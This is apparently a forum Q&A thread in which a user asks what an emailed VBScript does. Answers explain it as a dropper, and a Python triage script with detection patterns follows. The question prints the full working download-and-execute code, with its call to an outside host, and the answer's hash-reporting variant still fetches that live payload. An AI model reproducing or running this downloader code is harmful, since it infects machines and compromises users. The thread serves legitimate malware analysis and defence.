vbscript - Possible Extortion of Data


Someone sent me an email with a VBS script, and I don't know VBS.

I'm guessing it's a swindle to extort data from me, but I can't tell what data. Can someone please explain what the script does?

sub httpupload( myurl, mypath )
    dim objshell
    set objshell = wscript.createobject( "wscript.shell" )
    dim i, objfile, objfso, objhttp, strfile, strmsg
    const forreading = 1, forwriting = 2, forappending = 8
    set objfso = createobject( "scripting.filesystemobject" )
    const temporaryfolder = 2
    ' a randomly named .exe inside the user's temp folder is the drop location
    set tfolder = objfso.getspecialfolder(temporaryfolder)
    tname = objfso.gettempname + ".exe"
    mypath = tfolder + "/" + tname
    set objfile = tfolder.createtextfile(tname)
    ' fetch the remote file over http
    set objhttp = createobject( "winhttp.winhttprequest.5.1" )
    objhttp.open "get", myurl, false
    objhttp.send
    ' copy the response body byte by byte into the temp .exe
    for i = 1 to lenb( objhttp.responsebody )
        objfile.write chr( ascb( midb( objhttp.responsebody, i, 1 ) ) )
    next
    objfile.close( )
    ' and execute it
    objshell.run(mypath)
    set objshell = nothing
end sub
httpupload "http://baikalmix.ru/bitrix/js/seo/.../log.php?f=404", ""

As the other guy stated, it's a virus. It's downloading binary data, writing an exe, and firing it off. Modify the code below... delete the email and forget the dude. I know not "everyone" is as crazy as I am when it comes to finding viruses in the wild... I hoard these things and study them.

I've amended the changes to provide an MD5 hash and SHA256 hash that are searchable on VirusTotal, and to delete the file after. You'll need to re-append the line httpupload... and download... If you see below, I removed the line attempting to use the .run method.

httpupload "http://baikalmix.ru/bitrix/js/seo/.../log.php?f=404", "" 

The link provided is cut off, so if you still have the VBS file, remove the whole section from sub httpupload through end sub right before it... and replace the entire content of the VBS file with the following, except for the line mentioned above.

sub httpupload( myurl, mypath )
    dim objshell
    set objshell = wscript.createobject( "wscript.shell" )
    dim i, objfile, objfso, objhttp, strfile, strmsg
    const forreading = 1, forwriting = 2, forappending = 8
    set objfso = createobject( "scripting.filesystemobject" )
    const temporaryfolder = 2
    set tfolder = objfso.getspecialfolder(temporaryfolder)
    tname = objfso.gettempname + ".exe"
    mypath = tfolder + "/" + tname
    set objfile = tfolder.createtextfile(tname)
    set objhttp = createobject( "winhttp.winhttprequest.5.1" )
    objhttp.open "get", myurl, false
    objhttp.send
    for i = 1 to lenb( objhttp.responsebody )
        objfile.write chr( ascb( midb( objhttp.responsebody, i, 1 ) ) )
    next
    objfile.close( )
    ' report the hashes of the downloaded file for a VirusTotal lookup instead of running it
    wscript.echo "    md5hash: " & md5hash(mypath) & vbcrlf & " sha256hash: " & sha256hash(mypath)
    ' remove the downloaded file once the hashes have been reported
    objfso.deletefile mypath
    set objshell = nothing
end sub

function md5hash(spath)
    md5hash = bytestohex(md5hashbytes(getbytes(spath)))
end function

function sha256hash(spath)
    sha256hash = bytestohex(sha256hashbytes(getbytes(spath)))
end function

function md5hashbytes(abytes)
    set objmd5 = createobject("system.security.cryptography.md5cryptoserviceprovider")
    objmd5.initialize()
    md5hashbytes = objmd5.computehash_2( (abytes) )
end function

function sha256hashbytes(abytes)
    set objsha256 = createobject("system.security.cryptography.sha256managed")
    objsha256.initialize()
    sha256hashbytes = objsha256.computehash_2( (abytes) )
end function

function stringtoutfbytes(astring)
    set utf8 = createobject("system.text.utf8encoding")
    stringtoutfbytes = utf8.getbytes_4(astring)
end function

' render a byte array as lowercase-insensitive hex, two digits per byte
function bytestohex(abytes)
    dim x, hexstr
    for x = 1 to lenb(abytes)
        hexstr = hex(ascb(midb((abytes), x, 1)))
        if len(hexstr) = 1 then hexstr = "0" & hexstr
        bytestohex = bytestohex & hexstr
    next
end function

function bytestobase64(varbytes)
    with createobject("msxml2.domdocument").createelement("b64")
        .datatype = "bin.base64"
        .nodetypedvalue = varbytes
        bytestobase64 = .text
    end with
end function

' read a file from disk as a binary byte array
function getbytes(spath)
    with createobject("adodb.stream")
        .type = 1
        .open
        .loadfromfile spath
        .position = 0
        getbytes = .read
        .close
    end with
end function
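A defender-side way to triage a script like this without executing it, as an added example (Python, not code from the post): it looks for the download-and-execute chain the answer describes (HTTP fetch, response body written to a temp .exe, .run on it) and reports the sample's own MD5/SHA256 for a VirusTotal lookup. The VBS text is constructed from the posted skeleton with a placeholder URL in place of the truncated one.

```python
import hashlib
import re

# Constructed sample (not the real email attachment): the download-and-execute
# skeleton of the posted script, with a placeholder URL in place of the truncated one.
SAMPLE_VBS = """sub httpupload( myurl, mypath )
set objshell = wscript.createobject( "wscript.shell" )
set objfso = createobject( "scripting.filesystemobject" )
tname = objfso.gettempname + ".exe"
set objhttp = createobject( "winhttp.winhttprequest.5.1" )
objhttp.open "get", myurl, false
objhttp.send
objfile.write chr( ascb( midb( objhttp.responsebody, i, 1 ) ) )
objfile.close( )
objshell.run(mypath)
end sub
httpupload "http://example.invalid/log.php?f=404", ""
"""

# Static indicators of the dropper pattern the answer describes; VBScript is
# case-insensitive, so every pattern is matched with re.IGNORECASE.
INDICATORS = [
    ("http_client", r'createobject\s*\(\s*"(winhttp\.winhttprequest|msxml2\.(server)?xmlhttp)[^"]*"'),
    ("shell_object", r'createobject\s*\(\s*"wscript\.shell"'),
    ("temp_exe_name", r'gettempname\s*[+&]\s*"\.exe"'),
    ("binary_body_write", r'\.write\s+chr\s*\(\s*ascb\s*\(\s*midb\s*\(\s*\w+\.responsebody'),
    ("shell_run", r'\.run\s*\('),
]

def triage(source: str) -> dict:
    """Inspect VBScript text without executing it; return indicators, URLs,
    a verdict and the sample's own hashes for a VirusTotal lookup."""
    hits = {name for name, pat in INDICATORS if re.search(pat, source, re.IGNORECASE)}
    urls = re.findall(r'https?://[^\s"\']+', source, re.IGNORECASE)
    # fetch + write response body to disk + run it is the download-and-execute chain
    dropper = {"http_client", "binary_body_write", "shell_run"} <= hits
    raw = source.encode("utf-8")
    return {
        "indicators": sorted(hits),
        "urls": urls,
        "verdict": "download-and-execute dropper" if dropper else "no dropper pattern",
        "md5": hashlib.md5(raw).hexdigest(),
        "sha256": hashlib.sha256(raw).hexdigest(),
    }

if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBS).items():
        print(f"{key}: {value}")
```

To triage a real attachment, read its text (e.g. with encoding="latin-1" so arbitrary bytes decode) and pass it to triage(); the URLs it reports can be submitted to VirusTotal without ever fetching them.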
